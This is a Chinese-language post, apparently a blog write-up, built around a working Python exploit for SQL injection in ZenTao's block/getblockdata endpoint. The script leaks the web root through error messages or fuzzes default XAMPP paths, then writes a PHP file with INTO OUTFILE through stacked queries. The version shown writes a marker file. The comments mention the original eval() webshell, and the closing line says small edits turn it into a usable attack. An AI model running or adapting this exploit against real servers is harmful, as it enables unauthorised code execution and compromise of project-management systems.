这里不做具体展示,只是对原 exp 稍作修改,用于在 PoC 无回显时检测文件是否写入成功。
jas502n/zentao-getshell
发送该报错 PoC 时,可以从报错信息中获取服务路径,然后在对应目录下写入文件;但如果目标无回显,原脚本就无法进行下一步。
{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}
无回显时,直接以 fuzz 的方式遍历默认安装路径尝试写入;当然,如果目标存在 phpinfo 页面,从中拿到服务路径后直接写入即可。
# coding=utf-8
import requests
import base64
import re
import sys
import random
import string
import json
from fake_useragent import UserAgent
# Usage hint printed on import/startup (same text as the original triple-quoted banner).
banner = "\nusage: python exp.py http://127.0.0.1:81/\n"
print(banner)
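def urlwrite(url, get_shell, shell_name=None, user_agent=None, timeout=10):
    """Execute one `SELECT ... INTO OUTFILE` statement through the injection
    point and confirm the write by fetching the resulting file over HTTP.

    The statement is hex-encoded and run as a stacked query via
    `SET @SQL=0x..; PREPARE ..; EXECUTE ..`, exactly as in the original PoC.

    Args:
        url: Target base URL; a trailing slash is tolerated.
        get_shell: Complete SQL statement to execute.
        shell_name: File name expected under /zentao/. Defaults to the
            module-level `filename` assigned in `__main__`.
        user_agent: User-Agent header. Defaults to the module-level `new_ua`.
        timeout: Per-request timeout in seconds. The original sent requests
            with no timeout and could hang indefinitely on a filtered port.

    Returns:
        The URL of the written file when the marker is served back, else None.
        Progress is also printed, as before.

    NOTE: INTO OUTFILE fails silently when the DB user lacks FILE or
    secure_file_priv excludes the path; the only signal here is the marker
    not being served, which prints "写入失败" like any other failure.
    """
    url = url.rstrip('/')
    if shell_name is None:
        shell_name = filename
    if user_agent is None:
        user_agent = new_ua

    # A 0x<hex> literal sidesteps quoting inside the JSON-wrapped SQL.
    # b16encode works on Python 2 and 3 (str.encode('hex') is 2-only);
    # lower() only mirrors the original output, MySQL accepts either case.
    hex_str = base64.b16encode(get_shell.encode('utf-8')).decode('ascii').lower()
    payload1 = ('{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;'
                'EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}' % hex_str)
    # The query-string key is `&param=`. HTML-rendered copies of this PoC show
    # `¶m=` because `&para` was turned into the ¶ entity, which breaks the
    # request without any visible error.
    getshell_url = (url + "/zentao/index.php?m=block&f=main&mode=getblockdata"
                    "&blockid=case&param="
                    + base64.b64encode(payload1.encode('utf-8')).decode('ascii'))
    headers = {
        "Referer": "%s/zentao" % url,
        "User-Agent": user_agent,
    }

    r1 = requests.get(url=getshell_url, headers=headers, timeout=timeout)
    if r1.status_code != 200:
        print("写入失败")
        return None

    webshell = url + "/zentao/" + shell_name
    r2 = requests.get(url=webshell, headers=headers, timeout=timeout)
    # Bug in the original: the marker was looked for in r1 (the injection
    # response) instead of r2 (the file just written), so a successful write
    # was always reported as "写入失败".
    if r2.status_code == 200 and 'aaa' in r2.text:
        print("\n\n>>>>Webshell: \n%s" % webshell)
        return webshell
    print("写入失败")
    return None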
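def get_web_dir(url, filename):
    """Locate the ZenTao web root and try to write a harmless marker file there.

    Flow (as in the PoC, with the failure paths fixed):
      1. GET /zentao/index.php?mode=getconfig and print the reported version.
      2. Send the error-triggering payload through `param=`. When the response
         echoes the failing SQL together with a PHP "... in <path> on ..."
         notice, derive the install root from that path.
      3. Without an echo, fall back to the default XAMPP layouts on C:, D:
         and E: and try each one. The original built all three statements
         in a loop but only ever sent the last one (the loop overwrote
         `get_shell`), and on an HTTP error it reached `urlwrite()` with
         `get_shell` unbound.

    The fallback writes the same `echo "aaa"` marker as the echo branch
    (the original used an eval() shell there, which `urlwrite` could never
    confirm since it only checks for the 'aaa' marker). This keeps the
    script a pure write-detection check.

    Args:
        url: Target base URL; a trailing slash is tolerated.
        filename: Name of the marker file to create under www/.

    Returns:
        None. Results are printed; `urlwrite` is invoked per candidate path.
    """
    url = url.rstrip('/')
    timeout = 10
    headers = {
        # The original hard-coded http://127.0.0.1:81 as Referer here while
        # urlwrite() derived it from the target; use the target consistently.
        "Referer": "%s/zentao" % url,
        "User-Agent": new_ua,
    }

    version_url = url + "/zentao/index.php?mode=getconfig"
    r0 = requests.get(url=version_url, headers=headers, timeout=timeout)
    try:
        print("Cuurent Version= " + str(json.loads(r0.text)['version']))
    except (ValueError, KeyError, TypeError):
        # Non-JSON or unexpected shape is not fatal for the write check.
        print("无法解析版本信息")

    payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
    param = base64.b64encode(payload.encode('utf-8')).decode('ascii')
    # `&param=` — rendered copies of this PoC show `¶m=` (the `&para` entity).
    web_dir = (url + "/zentao/index.php?m=block&f=main&mode=getblockdata"
               "&blockid=case&param=" + param)
    r = requests.get(url=web_dir, headers=headers, timeout=timeout)
    if r.status_code != 200:
        print("出错")
        return

    if 'SELECT' in r.text:
        www_dir, install_root = _install_root_from_error(r.text)
        if install_root is None:
            print("报错信息中未解析出安装路径")
            return
        print('\n')
        print(www_dir)
        print('>>>>WWWROOT INSTALL: ' + install_root)
        candidates = [install_root + 'www//' + filename]
    else:
        # No echo: fuzz the default Windows install paths from the write-up.
        # Forward slashes match the echo branch and avoid MySQL treating the
        # backslashes in the literal as escapes.
        candidates = ['%s://zentao//xampp//zentao//www//%s' % (drive, filename)
                      for drive in ("C", "D", "E")]

    for path in candidates:
        get_shell = _marker_outfile_sql(path)
        print('\n%s\n' % get_shell)
        urlwrite(url, get_shell)


def _install_root_from_error(text):
    """Parse the PHP notice echoed in an injection error response.

    Expects a fragment like "... in C:\\xampp\\zentao\\framework\\x.php on line N".

    Returns:
        (www_dir, install_root): the failing file's path with each backslash
        rewritten as '//' (what the original printed), and its prefix up to
        the last 'framework' segment, i.e. the install root ending in '//'.
        Either element is None when its pattern is absent, where the original
        raised IndexError on `findall(...)[0]`.
    """
    hit = re.search(r'.*in (.*) on', text)
    if hit is None:
        return None, None
    www_dir = hit.group(1).replace('\\', "//")
    root = re.search(r'(.*)framework', www_dir, re.DOTALL)
    return www_dir, (root.group(1) if root else None)


def _marker_outfile_sql(path):
    """Build the INTO OUTFILE statement that writes the harmless 'aaa' marker.

    Double quotes inside the PHP keep the outer single-quoted SQL literal
    intact; the original `'<?php echo 'aaa';?>'` closed the literal at
    `echo '` and was not valid SQL.
    """
    return "select '<?php echo \"aaa\";?>' into outfile '%s'" % path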
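if __name__ == "__main__":
    # The original indexed sys.argv[1] unconditionally, so a missing argument
    # raised IndexError and the "url为空" message was unreachable.
    url = sys.argv[1] if len(sys.argv) > 1 else ""
    characters = string.ascii_lowercase + string.digits
    # Random marker name so repeated runs do not collide; it carries no
    # security weight, so `random` is sufficient here.
    filename = ''.join(random.choice(characters) for _ in range(5))
    ua = UserAgent()
    new_ua = ua.random
    if url:
        get_web_dir(url, filename)
    else:
        print("url为空")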
以上仅为检测脚本,稍作修改即可使用;实际环境中按目标情况调整写入路径和写入的文件内容即可。